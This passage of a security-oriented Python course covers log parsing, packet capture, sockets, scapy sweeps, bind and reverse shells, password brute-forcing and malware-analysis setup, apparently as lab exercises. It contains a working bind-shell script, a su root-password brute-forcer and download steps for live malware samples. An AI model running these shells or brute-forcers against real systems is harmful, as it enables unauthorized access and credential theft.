1382 | Working with another student after class we came up with another solution: | |
1383 | ||
1384 | #!/usr/bin/env python | |
1385 | ||
1386 | ||
1387 | # This line opens the log file | |
1388 | f=open('access_log',"r") | |
1389 | ||
1390 | # This line takes each line in the log file and stores it as an element in the list | |
1391 | lines = f.readlines() | |
1392 | ||
1393 | ||
1394 | # This lines stores the IP that the user types as a var called userinput | |
1395 | userinput = raw_input("Enter the IP you want to search for: ") | |
1396 | ||
1397 | ||
1398 | ||
1399 | # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found. | |
1400 | for ip in lines: | |
1401 | if ip.find(userinput) != -1: | |
1402 | print ip | |
1403 | ||
1404 | ||
1405 | ||
1406 | ################################################## | |
1407 | # Lession 14: Look for web attacks in a log file # | |
1408 | ################################################## | |
1409 | ||
1410 | In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log. | |
1411 | Supported attacks: | |
1412 | 1. SQL Injection | |
1413 | 2. Local File Inclusion | |
1414 | 3. Remote File Inclusion | |
1415 | 4. Cross-Site Scripting | |
1416 | ||
1417 | ||
1418 | ||
1419 | wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py | |
1420 | ||
1421 | The usage for scan_log.py is simple. You feed it an apache log file. | |
1422 | ||
1423 | cat scan_log.py | less (use your up/down arrow keys to look through the file) | |
1424 | ||
1425 | Explain to me how this script works. | |
1426 | ||
1427 | ||
1428 | ||
1429 | ################################ | |
1430 | # Lesson 15: Parsing CSV Files # | |
1431 | ################################ | |
1432 | ||
1433 | Dealing with csv files | |
1434 | ||
1435 | Reference: | |
1436 | http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/ | |
1437 | ||
1438 | Type the following commands: | |
1439 | --------------------------------------------------------------------------------------------------------- | |
1440 | ||
1441 | wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv | |
1442 | ||
1443 | ||
1444 | Example 1 - Reading CSV files | |
1445 | ----------------------------- | |
1446 | #To be able to read csv formated files, we will first have to import the | |
1447 | #csv module. | |
1448 | ||
1449 | ||
1450 | import csv | |
1451 | with open('class_nessus.csv', 'rb') as f: | |
1452 | reader = csv.reader(f) | |
1453 | for row in reader: | |
1454 | print row | |
1455 | ||
1456 | ||
1457 | ||
1458 | ||
1459 | ||
1460 | ||
1461 | Example 2 - Reading CSV files | |
1462 | ----------------------------- | |
1463 | vi readcsv.py | |
1464 | ||
1465 | ||
1466 | #!/usr/bin/python | |
1467 | import csv # imports the csv module | |
1468 | import sys # imports the sys module | |
1469 | ||
1470 | f = open(sys.argv[1], 'rb') # opens the csv file | |
1471 | try: | |
1472 | reader = csv.reader(f) # creates the reader object | |
1473 | for row in reader: # iterates the rows of the file in orders | |
1474 | print row # prints each row | |
1475 | finally: | |
1476 | f.close() # closing | |
1477 | ||
1478 | ||
1479 | ||
1480 | ||
1481 | ||
1482 | ||
1483 | Example 3 - - Reading CSV files | |
1484 | ------------------------------- | |
1485 | vi readcsv2.py | |
1486 | ||
1487 | ||
1488 | #!/usr/bin/python | |
1489 | # This program will then read it and displays its contents. | |
1490 | ||
1491 | ||
1492 | import csv | |
1493 | ||
1494 | ifile = open('class_nessus.csv', "rb") | |
1495 | reader = csv.reader(ifile) | |
1496 | ||
1497 | rownum = 0 | |
1498 | for row in reader: | |
1499 | # Save header row. | |
1500 | if rownum == 0: | |
1501 | header = row | |
1502 | else: | |
1503 | colnum = 0 | |
1504 | for col in row: | |
1505 | print '%-8s: %s' % (header[colnum], col) | |
1506 | colnum += 1 | |
1507 | ||
1508 | rownum += 1 | |
1509 | ||
1510 | ifile.close() | |
1511 | ||
1512 | ||
1513 | ||
1514 | ||
1515 | ||
1516 | ||
1517 | ||
1518 | ||
1519 | python readcsv2.py | less | |
1520 | ||
1521 | ||
1522 | ||
1523 | ||
1524 | ||
1525 | ||
1526 | ||
1527 | ||
1528 | /---------------------------------------------------/ | |
1529 | --------------------PARSING CSV FILES---------------- | |
1530 | /---------------------------------------------------/ | |
1531 | ||
1532 | -------------TASK 1------------ | |
1533 | vi readcsv3.py | |
1534 | ||
1535 | #!/usr/bin/python | |
1536 | import csv | |
1537 | f = open('class_nessus.csv', 'rb') | |
1538 | try: | |
1539 | rownum = 0 | |
1540 | reader = csv.reader(f) | |
1541 | for row in reader: | |
1542 | #Save header row. | |
1543 | if rownum == 0: | |
1544 | header = row | |
1545 | else: | |
1546 | colnum = 0 | |
1547 | if row[3].lower() == 'high': | |
1548 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
1549 | rownum += 1 | |
1550 | finally: | |
1551 | f.close() | |
1552 | ||
1553 | ||
1554 | ||
1555 | ||
1556 | ||
1557 | python readcsv3.py | less | |
1558 | ||
1559 | -------------TASK 2------------ | |
1560 | vi readcsv4.py | |
1561 | ||
1562 | #!/usr/bin/python | |
1563 | import csv | |
1564 | f = open('class_nessus.csv', 'rb') | |
1565 | try: | |
1566 | print '/---------------------------------------------------/' | |
1567 | rownum = 0 | |
1568 | hosts = {} | |
1569 | reader = csv.reader(f) | |
1570 | for row in reader: | |
1571 | # Save header row. | |
1572 | if rownum == 0: | |
1573 | header = row | |
1574 | else: | |
1575 | colnum = 0 | |
1576 | if row[3].lower() == 'high' and row[4] not in hosts: | |
1577 | hosts[row[4]] = row[4] | |
1578 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
1579 | rownum += 1 | |
1580 | finally: | |
1581 | f.close() | |
1582 | ||
1583 | ||
1584 | python readcsv4.py | less | |
1585 | ||
1586 | ||
1587 | ||
1588 | ||
1589 | ||
1590 | ||
1591 | ||
1592 | ||
1593 | ||
1594 | ||
1595 | ||
1596 | ||
1597 | ||
1598 | ||
1599 | ################################################# | |
1600 | # Lesson 16: Parsing Packets with Python's DPKT # | |
1601 | ################################################# | |
1602 | The first thing that you will need to do is install dpkt. | |
1603 | ||
1604 | sudo apt-get install -y python-dpkt | |
1605 | ||
1606 | ||
1607 | ||
1608 | ||
1609 | Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'. | |
1610 | Run tcpdump to capture a .pcap file that we will use for the next exercise | |
1611 | ||
1612 | ||
1613 | sudo tcpdump -ni eth0 -s0 -w quick.pcap | |
1614 | ||
1615 | ||
1616 | --open another command prompt-- | |
1617 | wget http://packetlife.net/media/library/12/tcpdump.pdf | |
1618 | ||
1619 | ||
1620 | Let's do something simple: | |
1621 | ||
1622 | ||
1623 | vi quickpcap.py | |
1624 | -------------------------------------------------------- | |
1625 | ||
1626 | #!/usr/bin/python | |
1627 | import dpkt; | |
1628 | ||
1629 | # Simple script to read the timestamps in a pcap file | |
1630 | # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html | |
1631 | ||
1632 | f = open("quick.pcap","rb") | |
1633 | pcap = dpkt.pcap.Reader(f) | |
1634 | ||
1635 | for ts, buf in pcap: | |
1636 | print ts; | |
1637 | ||
1638 | f.close(); | |
1639 | ||
1640 | ||
1641 | -------------------------------------------------------- | |
1642 | ||
1643 | Now let's run the script we just wrote | |
1644 | ||
1645 | ||
1646 | python quickpcap.py | |
1647 | ||
1648 | ||
1649 | ||
1650 | ||
1651 | How dpkt breaks down a packet: | |
1652 | ||
1653 | Reference: | |
1654 | http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html | |
1655 | ||
1656 | src: the MAC address of SOURCE. | |
1657 | dst: The MAC address of DESTINATION | |
1658 | type: The protocol type of contained ethernet payload. | |
1659 | ||
1660 | The allowed values are listed in the file "ethernet.py", | |
1661 | such as: | |
1662 | a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data. | |
1663 | b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data. | |
1664 | ||
1665 | ||
1666 | References: | |
1667 | http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python | |
1668 | ||
1669 | ||
1670 | ||
1671 | ||
1672 | ||
1673 | ||
1674 | Ok - now let's have a look at pcapparsing.py | |
1675 | ||
1676 | sudo tcpdump -ni eth0 -s0 -w capture-100.pcap | |
1677 | ||
1678 | ||
1679 | --open another command prompt-- | |
1680 | wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf | |
1681 | ||
1682 | ||
1683 | ||
1684 | Ok - now let's have a look at pcapparsing.py | |
1685 | -------------------------------------------------------- | |
1686 | ||
1687 | import socket | |
1688 | import dpkt | |
1689 | import sys | |
1690 | f = open('capture-100.pcap','r') | |
1691 | pcapReader = dpkt.pcap.Reader(f) | |
1692 | ||
1693 | for ts,data in pcapReader: | |
1694 | ether = dpkt.ethernet.Ethernet(data) | |
1695 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1696 | ip = ether.data | |
1697 | tcp = ip.data | |
1698 | src = socket.inet_ntoa(ip.src) | |
1699 | srcport = tcp.sport | |
1700 | dst = socket.inet_ntoa(ip.dst) | |
1701 | dstport = tcp.dport | |
1702 | print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport) | |
1703 | ||
1704 | f.close() | |
1705 | ||
1706 | -------------------------------------------------------- | |
1707 | ||
1708 | ||
1709 | ||
1710 | OK - let's run it: | |
1711 | python pcapparsing.py | |
1712 | ||
1713 | ||
1714 | ||
1715 | running this script might throw an error like this: | |
1716 | ||
1717 | Traceback (most recent call last): | |
1718 | File "pcapparsing.py", line 9, in <module> | |
1719 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1720 | ||
1721 | ||
1722 | If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something) | |
1723 | ||
1724 | ||
1725 | ||
1726 | ||
1727 | Your homework for today... | |
1728 | ||
1729 | ||
1730 | Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports. | |
1731 | ||
1732 | ||
1733 | ||
1734 | ||
1735 | ||
1736 | ||
1737 | Your challenge is to fix the Traceback error | |
1738 | ||
1739 | ||
1740 | ||
1741 | ||
1742 | #!/usr/bin/python | |
1743 | ||
1744 | import pcapy | |
1745 | import dpkt | |
1746 | import sys | |
1747 | import socket | |
1748 | import struct | |
1749 | ||
1750 | SINGLE_SHOT = False | |
1751 | ||
1752 | # list all the network devices | |
1753 | pcapy.findalldevs() | |
1754 | ||
1755 | iface = "eth0" | |
1756 | filter = "arp" | |
1757 | max_bytes = 1024 | |
1758 | promiscuous = False | |
1759 | read_timeout = 100 # in milliseconds | |
1760 | ||
1761 | pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout ) | |
1762 | pc.setfilter( filter ) | |
1763 | ||
1764 | # callback for received packets | |
1765 | def recv_pkts( hdr, data ): | |
1766 | packet = dpkt.ethernet.Ethernet( data ) | |
1767 | ||
1768 | print type( packet.data ) | |
1769 | print "ipsrc: %s, ipdst: %s" %( \ | |
1770 | socket.inet_ntoa( packet.data.spa ), \ | |
1771 | socket.inet_ntoa( packet.data.tpa ) ) | |
1772 | ||
1773 | print "macsrc: %s, macdst: %s " % ( | |
1774 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha), | |
1775 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) ) | |
1776 | ||
1777 | if SINGLE_SHOT: | |
1778 | header, data = pc.next() | |
1779 | sys.exit(0) | |
1780 | else: | |
1781 | packet_limit = -1 # infinite | |
1782 | pc.loop( packet_limit, recv_pkts ) # capture packets | |
1783 | ||
1784 | ||
1785 | ||
1786 | ||
1787 | ||
1788 | ||
1789 | ||
1790 | ||
1791 | ############################# | |
1792 | # Reference Videos To Watch # | |
1793 | ############################# | |
1794 | Here is your second set of youtube videos that I'd like for you to watch: | |
1795 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20) | |
1796 | ||
1797 | ||
1798 | ||
1799 | ||
1800 | ############################################# | |
1801 | # Lesson 17: Python Sockets & Port Scanning # | |
1802 | ############################################# | |
1803 | ||
1804 | ||
1805 | $ ncat -l -v -p 1234 | |
1806 | ||
1807 | ||
1808 | ||
1809 | ||
1810 | --open another terminal-- | |
1811 | python | |
1812 | ||
1813 | >>> import socket | |
1814 | >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1815 | >>> s.connect(('localhost', 1234)) | |
1816 | >>> s.send('Hello, world') | |
1817 | >>> data = s.recv(1024) | |
1818 | >>> s.close() | |
1819 | ||
1820 | >>> print 'Received', data | |
1821 | ||
1822 | ||
1823 | ||
1824 | ||
1825 | ||
1826 | ||
1827 | ######################################## | |
1828 | # Lesson 18: TCP Client and TCP Server # | |
1829 | ######################################## | |
1830 | ||
1831 | vi tcpclient.py | |
1832 | ||
1833 | ||
1834 | ||
1835 | #!/usr/bin/python | |
1836 | # tcpclient.py | |
1837 | ||
1838 | import socket | |
1839 | ||
1840 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1841 | hostport = ("127.0.0.1", 1337) | |
1842 | s.connect(hostport) | |
1843 | s.send("Hello\n") | |
1844 | buf = s.recv(1024) | |
1845 | print "Received", buf | |
1846 | ||
1847 | ||
1848 | ||
1849 | ||
1850 | ||
1851 | ||
1852 | ||
1853 | ||
1854 | ||
1855 | vi tcpserver.py | |
1856 | ||
1857 | ||
1858 | ||
1859 | ||
1860 | ||
1861 | #!/usr/bin/python | |
1862 | # tcpserver.py | |
1863 | ||
1864 | import socket | |
1865 | ||
1866 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1867 | hostport = ("", 1337) | |
1868 | s.bind(hostport) | |
1869 | s.listen(10) | |
1870 | while 1: | |
1871 | cli,addr = s.accept() | |
1872 | print "Connection from", addr | |
1873 | buf = cli.recv(1024) | |
1874 | print "Received", buf | |
1875 | if buf == "Hello\n": | |
1876 | cli.send("Server ID 1\n") | |
1877 | cli.close() | |
1878 | ||
1879 | ||
1880 | ||
1881 | ||
1882 | ||
1883 | ||
1884 | ||
1885 | ||
1886 | python tcpserver.py | |
1887 | ||
1888 | ||
1889 | --open another terminal-- | |
1890 | python tcpclient.py | |
1891 | ||
1892 | ||
1893 | ######################################## | |
1894 | # Lesson 19: UDP Client and UDP Server # | |
1895 | ######################################## | |
1896 | ||
1897 | vi udpclient.py | |
1898 | ||
1899 | ||
1900 | ||
1901 | ||
1902 | ||
1903 | ||
1904 | #!/usr/bin/python | |
1905 | # udpclient.py | |
1906 | ||
1907 | import socket | |
1908 | ||
1909 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1910 | hostport = ("127.0.0.1", 1337) | |
1911 | s.sendto("Hello\n", hostport) | |
1912 | buf = s.recv(1024) | |
1913 | print buf | |
1914 | ||
1915 | ||
1916 | ||
1917 | ||
1918 | ||
1919 | ||
1920 | ||
1921 | ||
1922 | ||
1923 | vi udpserver.py | |
1924 | ||
1925 | ||
1926 | ||
1927 | ||
1928 | ||
1929 | ||
1930 | #!/usr/bin/python | |
1931 | # udpserver.py | |
1932 | ||
1933 | import socket | |
1934 | ||
1935 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1936 | hostport = ("127.0.0.1", 1337) | |
1937 | s.bind(hostport) | |
1938 | while 1: | |
1939 | buf, address = s.recvfrom(1024) | |
1940 | print buf | |
1941 | if buf == "Hello\n": | |
1942 | s.sendto("Server ID 1\n", address) | |
1943 | ||
1944 | ||
1945 | ||
1946 | ||
1947 | ||
1948 | ||
1949 | python udpserver.py | |
1950 | ||
1951 | ||
1952 | --open another terminal-- | |
1953 | python udpclient.py | |
1954 | ||
1955 | ||
1956 | ||
1957 | ||
1958 | ||
1959 | ||
1960 | ############################### | |
1961 | # Lesson 20: Installing Scapy # | |
1962 | ############################### | |
1963 | ||
1964 | sudo apt-get update | |
1965 | sudo apt-get install python-scapy python-pyx python-gnuplot | |
1966 | ||
1967 | ||
1968 | Reference Page For All Of The Commands We Will Be Running: | |
1969 | http://samsclass.info/124/proj11/proj17-scapy.html | |
1970 | ||
1971 | Great slides for Scapy: | |
1972 | http://www.secdev.org/conf/scapy_csw05.pdf | |
1973 | ||
1974 | ||
1975 | ||
1976 | ||
1977 | To run Scapy interactively | |
1978 | ||
1979 | sudo scapy | |
1980 | ||
1981 | ||
1982 | ||
1983 | ################################################ | |
1984 | # Lesson 21: Sending ICMPv4 Packets with scapy # | |
1985 | ################################################ | |
1986 | ||
1987 | In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
1988 | ||
1989 | i = IP() | |
1990 | ||
1991 | ||
1992 | ||
1993 | ||
1994 | This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
1995 | ||
1996 | i.display() | |
1997 | ||
1998 | ||
1999 | ||
2000 | ||
2001 | Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
2002 | ||
2003 | i.dst="10.65.75.49" | |
2004 | ||
2005 | i.display() | |
2006 | ||
2007 | ||
2008 | ||
2009 | ||
2010 | Notice that scapy automatically fills in your machine's source IP address. | |
2011 | ||
2012 | Use these commands to create an object named ic of type ICMP and display its properties: | |
2013 | ||
2014 | ||
2015 | ic = ICMP() | |
2016 | ||
2017 | ic.display() | |
2018 | ||
2019 | ||
2020 | ||
2021 | ||
2022 | ||
2023 | Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
2024 | ||
2025 | sr1(i/ic) | |
2026 | ||
2027 | ||
2028 | ||
2029 | ||
2030 | ||
2031 | This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply. | |
2032 | ||
2033 | The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
2034 | ||
2035 | Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
2036 | ||
2037 | ||
2038 | sr1(i/ic/"YOUR NAME") | |
2039 | ||
2040 | ||
2041 | You should see a reply with a Raw section containing your name. | |
2042 | ||
2043 | ||
2044 | ||
2045 | ############################################## | |
2046 | # Lesson 22: Sending a UDP Packet with Scapy # | |
2047 | ############################################## | |
2048 | ||
2049 | ||
2050 | Preparing the Target | |
2051 | $ ncat -ulvp 4444 | |
2052 | ||
2053 | ||
2054 | ||
2055 | ||
2056 | --open another terminal-- | |
2057 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
2058 | ||
2059 | u = UDP() | |
2060 | ||
2061 | u.display() | |
2062 | ||
2063 | ||
2064 | ||
2065 | This creates an object named u of type UDP, and displays its properties. | |
2066 | ||
2067 | Execute these commands to change the destination port to 4444 and display the properties again: | |
2068 | ||
2069 | i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
2070 | ||
2071 | u.dport = 4444 | |
2072 | ||
2073 | u.display() | |
2074 | ||
2075 | ||
2076 | ||
2077 | Execute this command to send the packet to the Windows machine: | |
2078 | ||
2079 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
2080 | ||
2081 | ||
2082 | ||
2083 | On the Windows target, you should see the message appear | |
2084 | ||
2085 | ||
2086 | ||
2087 | ||
2088 | ####################################### | |
2089 | # Lesson 23: Ping Sweeping with Scapy # | |
2090 | ####################################### | |
2091 | ||
2092 | ||
2093 | ||
2094 | #!/usr/bin/python | |
2095 | from scapy.all import * | |
2096 | ||
2097 | TIMEOUT = 2 | |
2098 | conf.verb = 0 | |
2099 | for ip in range(0, 256): | |
2100 | packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP() | |
2101 | # You will need to change 10.10.30 above this line to the subnet for your network | |
2102 | reply = sr1(packet, timeout=TIMEOUT) | |
2103 | if not (reply is None): | |
2104 | print reply.dst, "is online" | |
2105 | else: | |
2106 | print "Timeout waiting for %s" % packet[IP].dst | |
2107 | ||
2108 | ||
2109 | ||
2110 | ############################################### | |
2111 | # Checking out some scapy based port scanners # | |
2112 | ############################################### | |
2113 | ||
2114 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
2115 | ||
2116 | cat rdp_scan.py | |
2117 | ||
2118 | sudo python rdp_scan.py | |
2119 | ||
2120 | ||
2121 | ###################################### | |
2122 | # Dealing with conf.verb=0 NameError # | |
2123 | ###################################### | |
2124 | ||
2125 | conf.verb = 0 | |
2126 | NameError: name 'conf' is not defined | |
2127 | ||
2128 | Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from: | |
2129 | ||
2130 | from scapy import * | |
2131 | to | |
2132 | from scapy.all import * | |
2133 | ||
2134 | ||
2135 | ||
2136 | Reference: | |
2137 | http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html | |
2138 | ||
2139 | ||
2140 | conf.verb=0 is a verbosity setting (configuration/verbosity = conv | |
2141 | ||
2142 | ||
2143 | ||
2144 | Here are some good Scapy references: | |
2145 | http://www.secdev.org/projects/scapy/doc/index.html | |
2146 | http://resources.infosecinstitute.com/port-scanning-using-scapy/ | |
2147 | http://www.hackerzvoice.net/ouah/blackmagic.txt | |
2148 | http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html | |
2149 | ||
2150 | ||
2151 | ###################################### | |
2152 | # Lesson 24: Bind and Reverse Shells # | |
2153 | ###################################### | |
2154 | vi simplebindshell.py | |
2155 | ||
2156 | ||
2157 | #!/bin/python | |
2158 | import os,sys,socket | |
2159 | ||
2160 | ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
2161 | print '-Creating socket..' | |
2162 | port = 31337 | |
2163 | try: | |
2164 | ls.bind(('', port)) | |
2165 | print '-Binding the port on ' | |
2166 | ls.listen(1) | |
2167 | print '-Listening, ' | |
2168 | (conn, addr) = ls.accept() | |
2169 | print '-Waiting for connection...' | |
2170 | cli= conn.fileno() | |
2171 | print '-Redirecting shell...' | |
2172 | os.dup2(cli, 0) | |
2173 | print 'In, ' | |
2174 | os.dup2(cli, 1) | |
2175 | print 'Out, ' | |
2176 | os.dup2(cli, 2) | |
2177 | print 'Err' | |
2178 | print 'Done!' | |
2179 | arg0='/bin/sh' | |
2180 | arg1='-a' | |
2181 | args=[arg0]+[arg1] | |
2182 | os.execv(arg0, args) | |
2183 | except(socket.error): | |
2184 | print 'fail\n' | |
2185 | conn.close() | |
2186 | sys.exit(1) | |
2187 | ||
2188 | ||
2189 | ||
2190 | ||
2191 | ||
2192 | ||
2193 | ||
2194 | nc TARGETIP 31337 | |
2195 | ||
2196 | ||
2197 | ||
2198 | --------------------- | |
2199 | Preparing the target for a reverse shell | |
2200 | $ ncat -lvp 4444 | |
2201 | ||
2202 | ||
2203 | ||
2204 | --open another terminal-- | |
2205 | wget https://www.trustedsec.com/files/simple_py_shell.py | |
2206 | ||
2207 | vi simple_py_shell.py | |
2208 | ||
2209 | ||
2210 | ||
2211 | ||
2212 | ||
2213 | ||
2214 | ------------------------------- | |
2215 | Tricky shells | |
2216 | ||
2217 | Reference: | |
2218 | http://securityweekly.com/2011/10/python-one-line-shell-code.html | |
2219 | http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/ | |
2220 | ||
2221 | ||
2222 | ||
2223 | ||
2224 | ||
2225 | ||
2226 | ############################# | |
2227 | # Reference Videos To Watch # | |
2228 | ############################# | |
2229 | Here is your third set of youtube videos that I'd like for you to watch: | |
2230 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30) | |
2231 | ||
2232 | ||
2233 | ||
2234 | ||
2235 | ################################################# | |
2236 | # Lesson 25: Python Functions & String Handling # | |
2237 | ################################################# | |
2238 | ||
2239 | Python can make use of functions: | |
2240 | http://www.tutorialspoint.com/python/python_functions.htm | |
2241 | ||
2242 | ||
2243 | ||
2244 | Python can interact with the 'crypt' function used to create Unix passwords: | |
2245 | http://docs.python.org/2/library/crypt.html | |
2246 | ||
2247 | ||
2248 | ||
2249 | Tonight we will see a lot of the split() method so be sure to keep the following references close by: | |
2250 | http://www.tutorialspoint.com/python/string_split.htm | |
2251 | ||
2252 | ||
2253 | Tonight we will see a lot of slicing so be sure to keep the following references close by: | |
2254 | http://techearth.net/python/index.php5?title=Python:Basics:Slices | |
2255 | ||
2256 | ||
2257 | ||
2258 | ||
2259 | ||
2260 | ################################ | |
2261 | # Lesson 26: Password Cracking # | |
2262 | ################################ | |
2263 | ||
2264 | wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py | |
2265 | ||
2266 | vi htcrack.py | |
2267 | ||
2268 | vi list.txt | |
2269 | ||
2270 | hello | |
2271 | goodbye | |
2272 | red | |
2273 | blue | |
2274 | yourname | |
2275 | tim | |
2276 | bob | |
2277 | ||
2278 | ||
2279 | htpasswd -nd yourname | |
2280 | - enter yourname as the password | |
2281 | ||
2282 | ||
2283 | ||
2284 | python htcrack.py joe:7XsJIbCFzqg/o list.txt | |
2285 | ||
2286 | ||
2287 | ||
2288 | ||
2289 | sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc | |
2290 | ||
2291 | rm -rf mechanize-0.2.5.tar.gz | |
2292 | ||
2293 | sudo /bin/bash | |
2294 | ||
2295 | passwd | |
2296 | ***set root password*** | |
2297 | ||
2298 | ||
2299 | ||
2300 | ||
2301 | vi rootbrute.py | |
2302 | ||
2303 | ||
2304 | #!/usr/bin/env python | |
2305 | ||
2306 | import sys | |
2307 | try: | |
2308 | import pexpect | |
2309 | except(ImportError): | |
2310 | print "\nYou need the pexpect module." | |
2311 | print "http://www.noah.org/wiki/Pexpect\n" | |
2312 | sys.exit(1) | |
2313 | ||
2314 | #Change this if needed. | |
2315 | # LOGIN_ERROR = 'su: incorrect password' | |
2316 | LOGIN_ERROR = "su: Authentication failure" | |
2317 | ||
2318 | def brute(word): | |
2319 | print "Trying:",word | |
2320 | child = pexpect.spawn('/bin/su') | |
2321 | child.expect('Password: ') | |
2322 | child.sendline(word) | |
2323 | i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3) | |
2324 | if i == 1: | |
2325 | print "Incorrect Password" | |
2326 | ||
2327 | if i == 2: | |
2328 | print "\n\t[!] Root Password:" ,word | |
2329 | child.sendline ('id') | |
2330 | print child.before | |
2331 | child.interact() | |
2332 | ||
2333 | if len(sys.argv) != 2: | |
2334 | print "\nUsage : ./rootbrute.py <wordlist>" | |
2335 | print "Eg: ./rootbrute.py words.txt\n" | |
2336 | sys.exit(1) | |
2337 | ||
2338 | try: | |
2339 | words = open(sys.argv[1], "r").readlines() | |
2340 | except(IOError): | |
2341 | print "\nError: Check your wordlist path\n" | |
2342 | sys.exit(1) | |
2343 | ||
2344 | print "\n[+] Loaded:",len(words),"words" | |
2345 | print "[+] BruteForcing...\n" | |
2346 | for word in words: | |
2347 | brute(word.replace("\n","")) | |
2348 | ||
2349 | ||
2350 | ||
2351 | ||
2352 | References you might find helpful: | |
2353 | http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python | |
2354 | ||
2355 | ||
2356 | ||
2357 | ||
2358 | ||
2359 | ||
2360 | ||
2361 | ||
2362 | ||
2363 | wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py | |
2364 | ||
2365 | vi md5crack.py | |
2366 | ||
2367 | ||
2368 | ||
2369 | ||
2370 | ||
2371 | ||
2372 | Why use hexdigest | |
2373 | http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string | |
2374 | ||
2375 | ||
2376 | ||
2377 | ||
2378 | http://md5online.net/ | |
2379 | ||
2380 | ||
2381 | ||
2382 | ||
2383 | ||
2384 | ||
2385 | ||
2386 | wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py | |
2387 | ||
2388 | ||
2389 | ||
2390 | ||
2391 | ############################# | |
2392 | # Reference Videos To Watch # | |
2393 | ############################# | |
2394 | Here is your forth set of youtube videos that I'd like for you to watch: | |
2395 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40) | |
2396 | ||
2397 | ||
2398 | ||
2399 | ||
2400 | ||
2401 | ||
2402 | ||
2403 | ||
2404 | ############################### | |
2405 | # Lesson 28: Malware Analysis # | |
2406 | ############################### | |
2407 | ||
2408 | ||
2409 | ||
2410 | ||
2411 | ############################ | |
2412 | # Download the Analysis VM # | |
2413 | ############################ | |
2414 | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip | |
2415 | user: infosecaddicts | |
2416 | pass: infosecaddicts | |
2417 | ||
2418 | ||
2419 | - Log in to your Ubuntu system with the username 'malware' and the password 'malware'. | |
2420 | ||
2421 | - After logging please open a terminal window and type the following commands: | |
2422 | ||
2423 | cd Desktop/ | |
2424 | ||
2425 | ||
2426 | - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': | |
2427 | ||
2428 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2429 | wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py | |
2430 | ||
2431 | unzip malware-password-is-infected.zip | |
2432 | infected | |
2433 | ||
2434 | file malware.exe | |
2435 | ||
2436 | mv malware.exe malware.pdf | |
2437 | ||
2438 | file malware.pdf | |
2439 | ||
2440 | mv malware.pdf malware.exe | |
2441 | ||
2442 | hexdump -n 2 -C malware.exe | |
2443 | ||
2444 | ***What is '4d 5a' or 'MZ'*** | |
2445 | Reference: | |
2446 | http://www.garykessler.net/library/file_sigs.html | |
2447 | ||
2448 | ||
2449 | objdump -x malware.exe | |
2450 | ||
2451 | strings malware.exe | |
